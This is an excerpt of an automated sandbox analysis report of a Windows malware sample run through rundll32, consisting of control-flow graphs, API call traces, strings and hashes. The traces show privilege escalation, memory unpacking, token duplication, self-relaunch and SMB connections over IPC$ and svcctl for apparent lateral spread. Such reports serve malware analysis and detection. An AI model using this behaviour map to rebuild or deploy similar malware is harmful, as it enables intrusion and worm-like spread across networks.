                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                              • String ID:
                                              • API String ID: 3700823678-0
                                              • Opcode ID: 314636c32d61e88ccb562140b8d806c541292b9ff82459506caa693cfcda2ac4
                                              • Instruction ID: 05e7cf551fcdbe47f42ef9925ffffbb79cde1bec97e1d539862b2940111ff8c1
                                              • Opcode Fuzzy Hash: 314636c32d61e88ccb562140b8d806c541292b9ff82459506caa693cfcda2ac4
                                              • Instruction Fuzzy Hash: 2D71D375900345FFEB149FA4CC49B9A7B68FF48700F04419AFB099B285D7B9E815CBA4

                                              Control-flow Graph

                                              control_flow_graph 173 4bf79d7-4bf79ec call 4bf7897 176 4bf79ee-4bf79f7 call 4bf923f 173->176 177 4bf79fc-4bf7a03 call 4bf7f04 173->177 176->177 181 4bf7a0d-4bf7a14 177->181 182 4bf7a05-4bf7a07 ExitProcess 177->182 183 4bf7a1b-4bf7acf call 4bf84ee call 4bf10a7 WSAStartup call 4bf6c5f * 2 InitializeCriticalSection call 4bf652f call 4bf7dd0 call 4bf8192 CreateEventW CreateThread 181->183 184 4bf7a16 call 4bf7e8e 181->184 200 4bf7b99-4bf7ba0 183->200 201 4bf7ad5-4bf7ae8 CreateThread 183->201 184->183 204 4bf7bde-4bf7bf1 Sleep call 4bf8a23 200->204 205 4bf7ba2-4bf7baf call 4bf554a 200->205 202 4bf7aea-4bf7af1 201->202 203 4bf7af8-4bf7b0a call 4bf6cc8 201->203 202->203 206 4bf7af3 call 4bf7146 202->206 216 4bf7b0c-4bf7b31 call 4bf6c5f call 4bf85fb 203->216 217 4bf7b63-4bf7b93 call 4bf6cc8 CreateThread call 4bfa420 Sleep 203->217 212 4bf7bf6-4bf7c16 GetSystemDirectoryW 204->212 205->204 214 4bf7bb1 205->214 206->203 219 4bf7c1c-4bf7c30 lstrcatW 212->219 220 4bf7cc0-4bf7cc2 212->220 218 4bf7bb3-4bf7bcd 214->218 216->217 235 4bf7b33-4bf7b39 216->235 217->200 218->218 223 4bf7bcf-4bf7bd9 call 4bf636b 218->223 219->220 224 4bf7c36-4bf7c4b GetModuleFileNameW 219->224 223->204 224->220 228 4bf7c4d-4bf7c7a PathFindFileNameW wsprintfW 224->228 231 4bf7c7c-4bf7c80 228->231 231->231 234 4bf7c82-4bf7c87 231->234 237 4bf7c8a-4bf7c8e 234->237 236 4bf7b3c-4bf7b4c call 4bfa3b1 call 4bf796e 235->236 243 4bf7b4e-4bf7b56 call 4bf6e66 236->243 244 4bf7b5b-4bf7b61 236->244 237->237 239 4bf7c90-4bf7cba CreateProcessW ExitProcess 237->239 243->244 244->217 244->236
                                              APIs
                                                • Part of subcall function 04BF7897: GetTickCount.KERNEL32 ref: 04BF78AF
                                                • Part of subcall function 04BF7897: srand.MSVCRT ref: 04BF78B2
                                                • Part of subcall function 04BF7897: GetTickCount.KERNEL32 ref: 04BF78B9
                                                • Part of subcall function 04BF7897: GetModuleFileNameW.KERNEL32(04C07BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF7926
                                              • ExitProcess.KERNEL32 ref: 04BF7A07
                                                • Part of subcall function 04BF923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04BF79FC,?,?,?), ref: 04BF927B
                                                • Part of subcall function 04BF923F: memcpy.MSVCRT ref: 04BF9294
                                                • Part of subcall function 04BF923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04BF9303
                                                • Part of subcall function 04BF923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04BF9323
                                              • WSAStartup.WS2_32(00000202,04C081E0), ref: 04BF7A3D
                                              • InitializeCriticalSection.KERNEL32(04C07B9C,00000008,04BF67F9,04BF682F,000000FF,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF7A80
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04BF7AAD
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF8A6F,00000000,00000000,00000000), ref: 04BF7AC6
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF77D1,00000000,00000000,00000000), ref: 04BF7ADF
                                                • Part of subcall function 04BF7E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04BF7EB1
                                                • Part of subcall function 04BF7E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04BF7EC3
                                              • CreateThread.KERNELBASE(00000000,00000000,04BFA1A9,00000000,00000000,00000000), ref: 04BF7B78
                                                • Part of subcall function 04BFA420: GetProcessHeap.KERNEL32(00000008,00000004,771B0F10,?,00000000,?,?,04BF7B89,000000FF), ref: 04BFA436
                                                • Part of subcall function 04BFA420: HeapAlloc.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA439
                                                • Part of subcall function 04BFA420: CreateThread.KERNELBASE(00000000,00000000,04BFA333,00000000,00000000,00000000), ref: 04BFA454
                                                • Part of subcall function 04BFA420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04BF7B89,000000FF), ref: 04BFA463
                                                • Part of subcall function 04BFA420: HeapFree.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA466
                                              • Sleep.KERNELBASE(?,000000FF), ref: 04BF7B93
                                              • Sleep.KERNELBASE(?), ref: 04BF7BEB
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF7C0E
                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04BF7C28
                                              • GetModuleFileNameW.KERNEL32(04C07BC8,0000030C), ref: 04BF7C43
                                              • PathFindFileNameW.SHLWAPI(04C07BC8,?), ref: 04BF7C51
                                              • wsprintfW.USER32 ref: 04BF7C6B
                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF7CB3
                                              • ExitProcess.KERNEL32 ref: 04BF7CBA
                                                • Part of subcall function 04BF554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04BF5561
                                                • Part of subcall function 04BF554A: GetLastError.KERNEL32(?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF556B
                                                • Part of subcall function 04BF554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF5581
                                                • Part of subcall function 04BF554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF558E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                              • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                              • API String ID: 1016975789-3730106045
                                              • Opcode ID: 15823d742771a1972f8a277f626032a97b43b1d9888fe1a06dfabe480219fe3e
                                              • Instruction ID: e0de9c92009e6d306d02956b37556c4ce42079bc90fd2c84cfcc678603c32bdf
                                              • Opcode Fuzzy Hash: 15823d742771a1972f8a277f626032a97b43b1d9888fe1a06dfabe480219fe3e
                                              • Instruction Fuzzy Hash: F981A4B5500209BBEB10AFB4DC84F9E7BADEF05304F0444E6FB09A6091DA74BE59CB60

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,04BF7AF8), ref: 04BF7164
                                                • Part of subcall function 04BF6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04BF7170,00000000,?,04BF7AF8), ref: 04BF6F8E
                                                • Part of subcall function 04BF6F7C: GetProcAddress.KERNEL32(00000000), ref: 04BF6F95
                                                • Part of subcall function 04BF8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04BF832A
                                                • Part of subcall function 04BF8313: LoadResource.KERNEL32(00000000), ref: 04BF8341
                                                • Part of subcall function 04BF8313: LockResource.KERNEL32(00000000), ref: 04BF8350
                                                • Part of subcall function 04BF8313: SizeofResource.KERNEL32(00000000), ref: 04BF8368
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04BF8384
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04BF838D
                                                • Part of subcall function 04BF8313: memcpy.MSVCRT ref: 04BF839C
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04BF83B9
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF83BC
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04BF840A
                                                • Part of subcall function 04BF8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF840D
                                              • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04BF7AF8), ref: 04BF71AA
                                              • CoCreateGuid.OLE32(?,771B0F10,?,04BF7AF8), ref: 04BF71C8
                                              • StringFromCLSID.OLE32(?,?,?,04BF7AF8), ref: 04BF71E1
                                              • wsprintfW.USER32 ref: 04BF721F
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF6FFE,?,00000000,00000000), ref: 04BF7236
                                              • memset.MSVCRT ref: 04BF7259
                                              • wsprintfW.USER32 ref: 04BF7281
                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF72A6
                                              • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 04BF72B8
                                                • Part of subcall function 04BF6CC8: EnterCriticalSection.KERNEL32(?,04BF7B03), ref: 04BF6CCD
                                                • Part of subcall function 04BF6CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04BF6CD9
                                                • Part of subcall function 04BF6CC8: LeaveCriticalSection.KERNEL32(?), ref: 04BF6CE0
                                              • TerminateThread.KERNELBASE(?,00000000), ref: 04BF72CD
                                              • CloseHandle.KERNEL32(?), ref: 04BF72D6
                                              • DeleteFileW.KERNELBASE(?,?,?), ref: 04BF7306
                                              • CoTaskMemFree.OLE32(?,?,?,?,04BF7AF8), ref: 04BF730F
                                              • GetProcessHeap.KERNEL32(00000000,?,?,04BF7AF8), ref: 04BF732C
                                              • RtlFreeHeap.NTDLL(00000000,?,04BF7AF8), ref: 04BF7333
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                              • String ID: "%ws" %ws$\\.\pipe\%ws
                                              • API String ID: 1475553426-4065786000
                                              • Opcode ID: b78cb292bcd982d48bdb531c30b90693f4ff03c6b9f16c28bd0efda7475c131e
                                              • Instruction ID: 0769fbcebb5afedb630bd5e308d520288ff8166c907730df04da8f4427d856b8
                                              • Opcode Fuzzy Hash: b78cb292bcd982d48bdb531c30b90693f4ff03c6b9f16c28bd0efda7475c131e
                                              • Instruction Fuzzy Hash: 0851F9B5900219BFDF119FE4DC84DEEB7BDEF08204F1445A6F60AE3110EA35AE598B60

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,771AF380,?,?,?,?,?,?,?,?), ref: 04BF21F5
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF21FE
                                              • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04BF2210
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2213
                                              • htons.WS2_32(00000029), ref: 04BF222E
                                              • send.WS2_32(?,?,0000002D,00000000), ref: 04BF2255
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF2271
                                              • memset.MSVCRT ref: 04BF2297
                                              • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04BF22A3
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF22A6
                                              • htons.WS2_32(00000023), ref: 04BF22C1
                                              • send.WS2_32(?,?,00000027,00000000), ref: 04BF22DA
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF22F2
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2314
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2317
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2323
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2326
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2331
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2334
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                              • String ID:
                                              • API String ID: 821554539-0
                                              • Opcode ID: eab37f8216f341fa2e2657f9bb79b2b08d6f327b5f0b30237c0a3bbd33633afa
                                              • Instruction ID: da87ce1a57f49c989df92fe7d0ba059298e2468071e9506b25e8aff4d5bf62a0
                                              • Opcode Fuzzy Hash: eab37f8216f341fa2e2657f9bb79b2b08d6f327b5f0b30237c0a3bbd33633afa
                                              • Instruction Fuzzy Hash: 02417E71A00305BFEB109FA5DC09F9E7BA8EF49754F008495FA499B280D679E908CB61

                                              Control-flow Graph

                                              control_flow_graph 337 4bf46c7-4bf46f4 GetProcessHeap HeapAlloc 338 4bf46fa-4bf4717 call 4bf2497 337->338 339 4bf4aa4 337->339 342 4bf471c-4bf471e 338->342 340 4bf4aab-4bf4ab2 339->340 343 4bf4724-4bf473f call 4bf3449 342->343 344 4bf47b1-4bf47bd GetProcessHeap HeapFree 342->344 343->344 347 4bf4741-4bf4743 343->347 344->340 348 4bf475a-4bf475c 347->348 349 4bf4745-4bf4756 call 4bf2e12 347->349 351 4bf4761-4bf4777 call 4bf29a2 348->351 349->344 354 4bf4758 349->354 357 4bf47cb 351->357 358 4bf4779-4bf4788 call 4bf21dc 351->358 356 4bf47ce-4bf47e7 call 4bf317c 354->356 356->344 365 4bf47e9-4bf4800 GetProcessHeap HeapAlloc 356->365 357->356 363 4bf47ae 358->363 364 4bf478a-4bf47a6 Sleep call 4bf2191 358->364 363->344 371 4bf47a8-4bf47ac 364->371 372 4bf47c2-4bf47c9 364->372 365->344 367 4bf4802-4bf4806 365->367 369 4bf480c-4bf481b GetProcessHeap HeapAlloc 367->369 370 4bf4959-4bf495d 367->370 375 4bf487e-4bf4882 369->375 376 4bf481d-4bf486c call 4bf3209 369->376 373 4bf495f-4bf4964 370->373 374 4bf49a6-4bf49df GetProcessHeap HeapAlloc 370->374 371->363 377 4bf475e 371->377 372->363 373->374 380 4bf4966-4bf49a2 373->380 374->375 381 4bf49e5-4bf4a3c call 4bf33a4 374->381 378 4bf4888-4bf48a4 Sleep GetProcessHeap HeapAlloc 375->378 379 4bf4a91-4bf4a9f GetProcessHeap HeapFree 375->379 387 4bf486e 376->387 388 4bf4872-4bf4878 GetProcessHeap HeapFree 376->388 377->351 378->379 384 4bf48aa-4bf4928 call 4bf32af GetProcessHeap HeapFree 378->384 379->344 380->374 381->388 390 4bf4a42-4bf4a49 381->390 392 4bf492e-4bf494e 384->392 393 4bf4a52-4bf4a70 call 4bf3680 384->393 387->388 388->375 390->393 392->379 395 4bf4954-4bf4956 392->395 397 4bf4a8e 393->397 398 4bf4a72-4bf4a88 call 4bf41e9 393->398 395->370 397->379 398->397 401 4bf4a8a 398->401 401->397
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 04BF46E4
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF46E7
                                                • Part of subcall function 04BF2497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24AF
                                                • Part of subcall function 04BF2497: HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24B8
                                                • Part of subcall function 04BF2497: GetProcessHeap.KERNEL32(00000008,00001124,771AF380,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24CD
                                                • Part of subcall function 04BF2497: HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24D0
                                                • Part of subcall function 04BF2497: rand.MSVCRT ref: 04BF24E1
                                                • Part of subcall function 04BF2497: htons.WS2_32(00001120), ref: 04BF24FF
                                                • Part of subcall function 04BF2497: rand.MSVCRT ref: 04BF255F
                                                • Part of subcall function 04BF2497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF2576
                                                • Part of subcall function 04BF2497: HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF257D
                                                • Part of subcall function 04BF2497: htons.WS2_32(0000015C), ref: 04BF259F
                                                • Part of subcall function 04BF2497: rand.MSVCRT ref: 04BF25CD
                                              • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF478F
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 04BF47B4
                                              • HeapFree.KERNEL32(00000000), ref: 04BF47B7
                                              • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 04BF47F0
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF47F9
                                              • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04BF4810
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4813
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04BF4875
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4878
                                              • Sleep.KERNEL32(000007D0), ref: 04BF488D
                                              • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04BF4897
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF489A
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04BF4911
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4914
                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 04BF49D2
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04BF2E32
                                                • Part of subcall function 04BF2E12: HeapAlloc.KERNEL32(00000000), ref: 04BF2E3B
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,00000048,771AF380), ref: 04BF2E4D
                                                • Part of subcall function 04BF2E12: HeapAlloc.KERNEL32(00000000), ref: 04BF2E50
                                                • Part of subcall function 04BF2E12: htons.WS2_32(00000044), ref: 04BF2E68
                                                • Part of subcall function 04BF2E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04BF2EF3
                                                • Part of subcall function 04BF2E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04BF2F0B
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF2F31
                                                • Part of subcall function 04BF2E12: HeapFree.KERNEL32(00000000), ref: 04BF2F38
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2F43
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF49D5
                                                • Part of subcall function 04BF3680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,771AF380,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF3698
                                                • Part of subcall function 04BF3680: HeapAlloc.KERNEL32(00000000,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36A1
                                                • Part of subcall function 04BF3680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36B1
                                                • Part of subcall function 04BF3680: HeapAlloc.KERNEL32(00000000,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36B4
                                                • Part of subcall function 04BF3680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36C7
                                                • Part of subcall function 04BF3680: HeapAlloc.KERNEL32(00000000,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36CA
                                                • Part of subcall function 04BF3680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF37A2
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF4A96
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4A99
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                              • String ID:
                                              • API String ID: 3041643382-0
                                              • Opcode ID: c9a7f14345732d78dab806f9e360a6f65746093f327ec7b6df371fd1e943d760
                                              • Instruction ID: fab5ae1f396929f9990e14213c3fa4e6cc4eadcd0b36708453dc8d545c773737
                                              • Opcode Fuzzy Hash: c9a7f14345732d78dab806f9e360a6f65746093f327ec7b6df371fd1e943d760
                                              • Instruction Fuzzy Hash: 91C1BE71500346EADB10CFA4CC04BABBBB5FF59304F00849AFA99D7690E774E958DBA4

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04BFA1EB
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA1F4
                                              • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04BFA209
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA20C
                                              • CreateThread.KERNELBASE(00000000,00000000,04BFA112,00000000,00000000,00000000), ref: 04BFA258
                                              • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 04BFA290
                                              • GetProcAddress.KERNEL32(00000000), ref: 04BFA297
                                              • CloseHandle.KERNEL32(00000000), ref: 04BFA2E1
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04BFA2EE
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA2F1
                                                • Part of subcall function 04BFA016: GetCurrentThread.KERNEL32 ref: 04BFA035
                                                • Part of subcall function 04BFA016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BFA1D0,00000000), ref: 04BFA03C
                                                • Part of subcall function 04BFA016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04BFA059
                                                • Part of subcall function 04BFA016: CloseHandle.KERNEL32(?,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA0F5
                                                • Part of subcall function 04BFA016: CloseHandle.KERNEL32(0000FFFF,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA105
                                              • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04BFA2FD
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA300
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                              • String ID: WaitForMultipleObjects$kernel32
                                              • API String ID: 2880803415-195431251
                                              • Opcode ID: e4a2b8013d872dbddd439393edc8b01b75ec43828463d454773414efe2824df5
                                              • Instruction ID: bad997a095533796462587219c3f44f851cc37a49d0d4cf42eff832c27a77a5a
                                              • Opcode Fuzzy Hash: e4a2b8013d872dbddd439393edc8b01b75ec43828463d454773414efe2824df5
                                              • Instruction Fuzzy Hash: 71417271B10205ABDF189FF8DC45BAEB7B8FB4C310F104569E61DE7280EB74A9458B60

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,771ADFF0,00000000,?,?,?,?,04BF943A,?), ref: 04BF534B
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF5352
                                              • rand.MSVCRT ref: 04BF5388
                                              • rand.MSVCRT ref: 04BF53A8
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 04BF53B4
                                              • htons.WS2_32(000001BD), ref: 04BF53DA
                                              • inet_addr.WS2_32(?), ref: 04BF53E7
                                              • connect.WS2_32(00000000,?,00000010), ref: 04BF53F7
                                                • Part of subcall function 04BF516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04BF51D3
                                                • Part of subcall function 04BF516B: HeapAlloc.KERNEL32(00000000), ref: 04BF51DC
                                                • Part of subcall function 04BF516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04BF5205
                                                • Part of subcall function 04BF516B: HeapAlloc.KERNEL32(00000000), ref: 04BF5208
                                                • Part of subcall function 04BF516B: rand.MSVCRT ref: 04BF521B
                                                • Part of subcall function 04BF516B: rand.MSVCRT ref: 04BF5226
                                                • Part of subcall function 04BF516B: rand.MSVCRT ref: 04BF522F
                                                • Part of subcall function 04BF516B: sprintf.MSVCRT ref: 04BF5246
                                                • Part of subcall function 04BF516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5252
                                                • Part of subcall function 04BF516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5255
                                              • closesocket.WS2_32(00000000), ref: 04BF54E7
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A,?), ref: 04BF54F0
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A,?), ref: 04BF54F7
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
